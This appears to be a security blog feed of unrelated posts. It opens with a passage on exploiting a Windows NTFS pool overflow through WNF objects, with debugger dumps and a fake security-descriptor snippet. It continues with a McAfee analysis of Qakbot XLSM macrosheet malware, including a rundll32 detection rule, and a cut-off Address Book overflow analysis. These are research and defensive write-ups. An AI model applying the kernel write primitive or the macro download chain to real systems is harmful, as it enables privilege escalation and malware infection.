 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then after our NTFS extended attributes overflow has occurred and we have overwritten a number of fields:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address. At this was used within the in the wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and this could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the internal state name needs to match the external name queried from.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

There is the external version of the StateName which is the internal version of the StateName XOR’d with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb

The key thing to realise here is that whilst Version, LifeTime, DataScope and Sequence are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see from the below, based on the DataScope the current server Silo Globals or the Server Silo Globals are offset into to obtain v10 and then this used as the Sequence which is incremented by 1 each time.

Then in order to lookup a name instance the following code is taken:

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as this is outside of the _RTL_BALANCED_NODE rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

Each of the _WNF_NAME_INSTANCE are joined together with the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateName‘s of the objects which have been heap sprayed, you don’t necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers, however, the main caveat with that is that care needs to be taken to avoid safe unlinking protection occurring.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide the fake the security descriptor with the same values. This didn’t work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).

Ok then! Lets just make the DACL NULL, so that the everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c;
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;

EPROCESS Corruption

Initially when testing out the arbitrary write, I was expecting that when I set the StateData pointer to be 0x6161616161616161 a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, this is caught and the NT status -1073741819 which is STATUS_ACCESS_VIOLATION is propagated back to userland. This made initial debugging more challenging, as the code around that function was a significantly hot path and with conditional breakpoints lead to a huge program standstill.

Anyhow, typically after achieving an arbitrary write an attacker will either leverage to perform a data-only based privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following steps were needing to be taken:

1) The internal StateName matched up with the correct internal StateName so the correct external StateName can be found when required.
2) The Security Descriptor passing the checks in ExpWnfCheckCallerAccess.
3) The offsets of DataSize and AllocSize being appropriate for the area of memory desired.

So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker controlled data.

At this point typical approaches would be to either:

1) Target KTHREAD structures PreviousMode member

2) Target the EPROCESS token

These approaches and pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitive. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean up and continuation.

Kernel Reving

31 December 2020 at 05:00
Kernel Stuff So hunting in explorere.exe is all well and good, and I’ve been enjoying it. However, I need to get ready for a course I’m giving on the 31st of January! If you’re not familiar with our HTP green belt course (https://www.hyperiongray.com/htp) we focus heavily on Windows 10 kernel...

Fusssing

28 December 2020 at 05:00
Alright tired today but doing two things. One fuzzing: /* SHSTDAPI SHParseDisplayName( PCWSTR pszName, IBindCtx *pbc, PIDLIST_ABSOLUTE *ppidl, SFGAOF sfgaoIn, SFGAOF *psfgaoOut ); */ #include <shlobj_core.h> #include <shlobj.h> #include <shlwapi.h> #include <iostream> #include <objbase.h> #include <string.h> #include <stdio.h> #include <stdlib.h> int OohBabyIneedSomeFuzz(const uint8_t *Data) { ULONG *ulong; LPCWSTR str2 =...

Moar Fuzz 3 - Electric Tree!!!

17 December 2020 at 05:00
Sorry for the nonsensical title. I’m a little drunk. Anyway, here’s a crash: ==15384==ERROR: AddressSanitizer: attempting to call malloc_usable_size() for pointer which is not owned: 0x0000004df3e0 #0 0x7ff6c5231fd4 in __sanitizer::BufferedStackTrace::UnwindImpl(unsigned __int64, unsigned __int64, void *, bool, unsigned int) C:\src\llvm_package_1100-final\llvm-project\compiler-rt\lib\asan\asan_stack.cpp:77 #1 0x7ff6c524d646 in __asan::asan_malloc_usable_size(void const *, unsigned __int64, unsigned __int64) C:\src\llvm_package_1100-final\llvm-project\compiler-rt\lib\asan\asan_allocator.cpp:986...

Journal

27 March 2020 at 04:00
layout: post title: Browser Fuzzing tags: [hacking] — Well it fucking happened. I stopped writing to this blog for a while. Who saw that coming? Anyway I’m making a comeback. The delay in posts was caused by 🥁 - me being in the fucking hospital. Some highlights: perfortated intestine, lost...

The Rise of Deep Learning for Detection and Classification of Malware

13 August 2021 at 00:50

Co-written by Catherine Huang, Ph.D. and Abhishek Karnik 

Artificial Intelligence (AI) continues to evolve and has made huge progress over the last decade. AI shapes our daily lives. Deep learning is a subset of techniques in AI that extract patterns from data using neural networks. Deep learning has been applied to image segmentation, protein structure, machine translation, speech recognition and robotics. It has outperformed human champions in the game of Go. In recent years, deep learning has been applied to malware analysis. Different types of deep learning algorithms, such as convolutional neural networks (CNN), recurrent neural networks and Feed-Forward networks, have been applied to a variety of use cases in malware analysis using bytes sequence, gray-scale image, structural entropy, API call sequence, HTTP traffic and network behavior.  

Most traditional machine learning malware classification and detection approaches rely on handcrafted features. These features are selected based on experts with domain knowledge. Feature engineering can be a very time-consuming process, and handcrafted features may not generalize well to novel malware. In this blog, we briefly describe how we apply CNN on raw bytes for malware detection and classification in real-world data. 

  1. CNN on Raw Bytes 

Figure 1: CNNs on raw bytes for malware detection and classification

The motivation for applying deep learning is to identify new patterns in raw bytes. The novelty of this work is threefold. First, there is no domain-specific feature extraction and pre-processing. Second, it is an end-to-end deep learning approach. It can also perform end-to-end classification. And it can be a feature extractor for feature augmentation. Third, the explainable AI (XAI) provides insights on the CNN decisions and help human identify interesting patterns across malware families. As shown in Figure 1, the input is only raw bytes and labels. CNN performs representation learning to automatically learn features and classify malware.  

2. Experimental Results 

For the purposes of our experiments with malware detection, we first gathered 833,000 distinct binary samples (Dirty and Clean) across multiple families, compilers and varying “first-seen” time periods. There were large groups of samples from common families although they did utilize varying packers, obfuscators. Sanity checks were performed to discard samples that were corrupt, too large or too small, based on our experiment. From samples that met our sanity check criteria, we extracted raw bytes from these samples and utilized them for conducting multiple experiments. The data was randomly divided into a training and a test set with an 80% / 20% split. We utilized this data set to run the three experiments.  

In our first experiment, raw bytes from the 833,000 samples were fed to the CNN and the performance accuracy in terms of area under receiver operating curve (ROC) was 0.9953.  

One observation with the initial run was that, after raw byte extraction from the 833,000 unique samples, we did find duplicate raw byte entries. This was primarily due to malware families that utilized hash-busting as an approach to polymorphism. Therefore, in our second experiment, we deduplicated the extracted raw byte entries. This reduced the raw byte input vector count to 262,000 samples. The test area under ROC was 0.9920. 

In our third experiment, we attempted multi-family malware classification. We took a subset of 130,000 samples from the original set and labeled 11 categories – the 0th were bucketed as Clean, 1-9 of which were malware families, and the 10th were bucketed as Others. Again, these 11 buckets contain samples with varying packers and compilers. We performed another 80 / 20% random split for the training set and test set. For this experiment, we achieved a test accuracy of 0.9700. The training and test time on one GPU was 26 minutes.  

3. Visual Explanation 

Figure 2: visual explanation using T-SNE and PCA before and after the CNN training
Figure 2: A visual explanation using T-SNE and PCA before and after the CNN training

To understand the CNN training process, we performed a visual analysis for the CNN training. Figure 2 shows the t-Distributed Stochastic Neighbor Embedding (t-SNE) and Principal Component Analysis (PCA) for before and after CNN training. We can see that after training, CNN is able to extract useful representations to capture characteristics of different types of malware as shown in different clusters. There was a good separation for most categories, lending us to believe that the algorithm was useful as a multi-class classifier. 

We then performed XAI to understand CNN’s decisions. Figure 3 shows XAI heatmaps for one sample of Fareit and one sample of Emotet. The brighter the color is the more important the bytes contributing to the gradient activation in neural networks. Thus, those bytes are important to CNN’s decisions. We were interested in understanding the bytes that weighed in heavily on the decision-making and reviewed some samples manually. 

Figure 3: XAI heatmaps on Fareit (left) and Emotet (right)
Figure 3: XAI heatmaps on Fareit (left) and Emotet (right)

4. Human analysis to understand the ML decision and XAI  

Figure 4: Human analysis on CNN’s predictions
Figure 4: Human analysis on CNN’s predictions

To verify if the CNN can learn new patterns, we fed a few never before seen samples to the CNN, and requested a human expert to verify the CNN’s decision on some random samples. The human analysis verified that the CNN was able to correctly identify many malware familiesIn some cases, it identified samples accurately before the top 15 AV vendors based on our internal tests. Figure 4 shows a subset of samples that belong to the Nabucur family that were correctly categorized by the CNN despite having no vendor detection at that point in timeIt’s also interesting to note that our results showed that the CNN was able to currently categorize malware samples across families utilizing common packers into an accurate family bucket. 

Figure 5: domain analysis on sample compiler
Figure 5: domain analysis on sample compiler

We ran domain analysis on the same sample complier VB files. As shown in Figure 5, CNN was able to identify two samples of a threat family before other vendors. CNN agreed with MSMP/other vendors on two samples. In this experiment, the CNN incorrectly identified one sample as Clean.  

Figure 6: Human analysis on an XAI heatmap. Above is the resulting disassembly of part of the decryption tea algorithm from the Hiew tool.
Figure 6: Human analysis on an XAI heatmap. Above is the resulting disassembly of part of the decryption tea algorithm from the Hiew tool.
Above is XAI heatmap for one sample.
Above is XAI heatmap for one sample.

We asked a human expert to inspect an XAI heatmap and verify if those bytes in bright color are associated with the malware family classification. Figure 6 shows one sample which belongs to the Sodinokibi family. The bytes identified by the XAI (c3 8b 4d 08 03 d1 66 c1) are interesting because the byte sequence belongs to part of the Tea decryption algorithm. This indicates these bytes are associated with the malware classification, which confirms the CNN can learn and help identify useful patterns which humans or other automation may have overlooked. Although these experiments were rudimentary, they were indicative of the effectiveness of the CNN in identifying unknown patterns of interest.  

In summary, the experimental results and visual explanations demonstrate that CNN can automatically learn PE raw byte representations. CNN raw byte model can perform end-to-end malware classification. CNN can be a feature extractor for feature augmentation. The CNN raw byte model has the potential to identify threat families before other vendors and identify novel threats. These initial results indicate that CNN’s can be a very useful tool to assist automation and human researcher in analysis and classification. Although we still need to conduct a broader range of experiments, it is encouraging to know that our findings can already be applied for early threat triage, identification, and categorization which can be very useful for threat prioritization.  

We believe that McAfee’s ongoing AI research, such as deep learning-based approaches, leads the security industry to tackle the evolving threat landscape, and we look forward to continuing to share our findings in this space with the security community. 

The post The Rise of Deep Learning for Detection and Classification of Malware appeared first on McAfee Blog.

XLSM Malware with MacroSheets

6 August 2021 at 20:29

Written by: Lakshya Mathur

Excel-based malware has been around for decades and has been in the limelight in recent years. During the second half of 2020, we saw adversaries using Excel 4.0 macros, an old technology, to deliver payloads to their victims. They were mainly using workbook streams via the XLSX file format. In these streams, adversaries were able to enter code straight into cells (that’s why they were called macro-formulas). Excel 4.0 also used API level functions like downloading a file, creation of files, invocation of other processes like PowerShell, cmd, etc.  

With the evolution of technology, AV vendors started to detect these malicious Excel documents effectively and so to have more obfuscation and evasion routines attackers began to shift to the XLSM file format. In the first half of 2021, we have seen a surge of XLSM malware delivering different family payloads (as shown in below infection chart). In XLSM adversaries make use of Macrosheets to enter their malicious code directly into the cell formulas. XLSM structure is the same as XLSX, but XLSM files support VBA macros which are more advanced technology of Excel 4.0 macros. Using these macrosheets, attackers were able to access powerful windows functionalities and since this technique is new and highly obfuscated it can evade many AV detections. 

Excel 4.0 and XLSM are both known to download other malware payloads like ZLoader, Trickbot, Qakbot, Ursnif, IcedID, etc. 

Field hits for XLSM macrosheet malware detection
Field hits for XLSM macrosheet malware detection

The above figure shows the Number of samples weekly detected by the detected name “Downloader-FCEI” which specifically targets XLSM macrosheet based malware. 

Detailed Technical Analysis 

XLSM Structure 

XLSM files are spreadsheet files that support macros. A macro is a set of instructions that performs a record of steps repeatedly. XLSM files are based upon Open XLM formats that were introduced in Microsoft Office 2007. These file types are like XLSX but in addition, they support macros. 

Talking about the XLSM structure when we unzip the file, we see four basic contents of the file, these are shown below. 

Figure-1: Content inside XLSM file
Figure-1: Content inside XLSM file
  • _rels contains the starting package-level relationship. 
  • docProps contains the metadata of the excel file. 
  • xl folder contains the actual contents of the file. 
  • [Content_Types].xml has references to the XML files present within the above folders. 

We will focus more on the “xl” folder contents. This folder contains all the excel file main contents like all the worksheets, media files, styles.xml file, sharedStrings.xml file, workbook.xml file, etc. All these files and folders have data related to different aspects of the excel file. But for XLSM files we will focus on one unique folder called macrosheets. 

These XLSM files contain macrosheets as shown in figure-2 which are nothing but XML sheet files that can support macros. These sheets are not available in other Excel file formats. In the past few months, we have seen a huge surge in XLSM file-type malware in which attackers store malicious strings hidden within these macrosheets. We will see more details about such malware in this blog. 

Figure-2: Macrosheets folder inside xl folder
Figure-2: Macrosheets folder inside xl folder

To explain further how attackers uses XLSM files we have taken a Qakbot sample with SHA 91a1ba70132139c99efd73ca21c4721927a213bcd529c87e908a9fdd71570f1e. 

Infection Chain

Figure-3: Infection chain for Qakbot Malware
Figure-3: Infection chain for Qakbot Malware

The infection chain for both Excel 4.0 Qakbot and XLSM Qakbot is similar. They both downloads dll and execute it using rundll32.exe with DllResgisterServer as the export function. 

XLSM Threat Analysis 

On opening the XLSM file there is an image that prompts the user to enable the content. To look legitimate and clean malicious actors use a very official-looking template as shown below.

Figure-4: Image of Xlsm file face
Figure-4 Image of Xlsm file face

On digging deeper, we see its internal workbook.xml file. 

Figure-5: workbook.xml content
Figure-5: workbook.xml content

Now as we can see in the workbook.xml file (Figure-5), there is a total of 6 sheets and their state is hidden. Also, two cells have a predefined name and one of them is Sheet2323!$A$1 defined as “_xlnm.Auto_Open” which is similar to Sub Auto_Open() as we generally see in macro files. It automatically runs the macros when the user clicks on Enable Content.  

As we saw in Figure-3 on opening the file, we only see the enable content image. Since the state of sheets was hidden, we can right-click on the main sheet tab and we will see unhide option there, then we can select each sheet to unhide it. On hiding the sheet and change the font color to red we saw some random strings as seen in figure 6. 

Figure-6: Sheet face of xlsm file
Figure-6: Sheet face of xlsm file

These hidden sheets contain malicious strings in an obfuscated manner. So, on analyzing more we observed that sheets inside the macrosheets folder contain these malicious strings. 

Figure-7: Content of macrosheet XML file
Figure-7: Content of macrosheet XML file

Now as we can in figure-7 different tags are used in this XML sheet file. All the malicious strings are present in two tags <f> and <v> tags inside <sheetdata> tags. Now let’s look more in detail about these tags. 

<v> (Cell Value) tags are used to store values inside the cell. <f> (Cell Formula) tags are used to store formulas inside the cell. Now in the above sheet <v> tags contain the cached formula value based on the last time formula was calculated. Formula cells contain formulas like “GOTO(Sheet2!H13)”, now as we can see here attackers can store different formulas while referencing cells from different sheets. These operations are done to produce more and more obfuscated sheets and evade AV signatures. 

When the user clicks on the enable content button the execution starts from the Auto_Open cell, after which each sheet formula will start to execute one by one. The final deobfuscated string is shown below. 

Figure-8: Final De-Obfuscated strings from the file
Figure-8: Final De-Obfuscated strings from the file

Here the URLDownloadToFIleA API is used to download the payload and the string “JJCCBB” is used to specify data types to call the API. There are multiple URI’s and from one of them, the DLL payload gets downloaded and saved as ..\\lertio.cersw. This DLL payload is then executed using rundll32. All these malicious activities get carried out using various excel based formulas like REGISTER, EXEC, etc. 

Coverage and prevention guidance: 

McAfee’s Endpoint products detect this variant of malware as below: 

The main malicious document with SHA256 (91a1ba70132139c99efd73ca21c4721927a213bcd529c87e908a9fdd71570f1e) is detected as “Downloader-FCEI” with current DAT files. 

Additionally, with the help of McAfee’s Expert rule feature, customers can add a custom behavior rule, specific to this infection pattern. 

Rule { 

    Process { 

        Include OBJECT_NAME { -v “EXCEL.exe” } 

    } 

Target { 

        Match PROCESS { 

            Include OBJECT_NAME { -v “rundll32.exe” } 

                      Include PROCESS_CMD_LINE { -v “* ..\\*.*,DllRegisterServer” }  

                            Include -access “CREATE” 

         } 

  } 

} 

McAfee advises all users to avoid opening any email attachments or clicking any links present in the mail without verifying the identity of the sender. Always disable the Macro execution for Office files. We advise everyone to read our blog on these types of malicious XLSM files and their obfuscation techniques to understand more about the threat. 

Different techniques & tactics are used by the malware to propagate, and we mapped these with the MITRE ATT&CK platform. 

  • T1064(Scripting): Use of Excel 4.0 macros and different excel formulas to download the malicious payload. 
  • Defense Evasion (T1218.011): Execution of Signed binary to abuse Rundll32.exe and proxy executes the malicious code is observed in this Qakbot variant.  
  • Defense Evasion (T1562.001): Office file tries to convince a victim to disable security features by using a clean-looking image. 
  • Command and Control(T1071): Use of Application Layer Protocol HTTP to connect to the web and then downloads the malicious payload. 

Conclusion 

XLSM malware has been seen delivering many malware families. Many major families like Trickbot, Gozi, IcedID, Qakbot are using these XLSM macrosheets in high quantity to deliver their payloads. These attacks are still evolving and keep on using various obfuscated strings to exploit various windows utilities like rundll32, regsvr32, PowerShell, etc. 

Due to security concerns, macros are disabled by default in Microsoft Office applications. We suggest it is only safe to enable them when the document received is from a trusted source and macros serve an expected purpose. 

The post XLSM Malware with MacroSheets appeared first on McAfee Blog.

Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book

5 August 2021 at 12:26

By Eneko Cruz Elejalde

Overview

This post analyzes a heap-buffer overflow in Microsoft Windows Address Book. Microsoft released an advisory for this vulnerability for the 2021 February patch Tuesday. This post will go into detail about what Microsoft Windows Address Book is, the vulnerability itself, and the steps to craft a proof-of-concept exploit that crashes the vulnerable application.

Windows Address Book

Windows Address Book is a part of the Microsoft Windows operating system and is a service that provides users with a centralized list of contacts that can be accessed and modified by both Microsoft and third party applications. The Windows Address Book maintains a local database and interface for finding and editing information about contacts, and can query network directory servers using Lightweight Directory Access Protocol (LDAP). The Windows Address Book was introduced in 1996 and was later replaced by Windows Contacts in Windows Vista and subsequently by the People App in Windows 10.

The Windows Address Book provides an API that enables other applications to directly use its database and user interface services to enable services to access and modify contact information. While Microsoft has replaced the application providing the Address Book functionality, newer replacements make use of old functionality and ensure backwards compatibility. The Windows Address Book functionality is present in several Windows Libraries that are used by Windows 10 applications, including Outlook and Windows Mail. In this way, modern applications make use of the Windows Address Book and can even import address books from older versions of Windows.

CVE-2021-24083

A heap-buffer overflow vulnerability exists within the SecurityCheckPropArrayBuffer() function within wab32.dll when processing nested properties of a contact. The network-based attack vector involves enticing a user to open a crafted .wab file containing a malicious composite property in a WAB record.

Vulnerability

The vulnerability analysis that follows is based on Windows Address Book Contacts DLL (wab32.dll) version 10.0.19041.388 running on Windows 10 x64.

